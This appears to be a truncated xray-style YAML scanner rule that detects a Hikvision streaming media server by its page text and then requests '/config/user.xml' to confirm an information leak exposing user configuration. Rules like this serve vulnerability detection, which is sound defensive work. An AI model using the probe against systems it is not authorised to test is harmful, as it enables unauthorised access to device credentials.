name: poc-yaml-hikvision-info-leak rules: - method: GET path: / follow_redirects: false expression: | response.status == 200 && response.body.bcontains(b"流媒体管理服务器") && response.body.bcontains(b"海康威视") - method: GET path: /config/user.xml follow_redirects: false expression: | response.status == 200 && response.body.bcontains(b"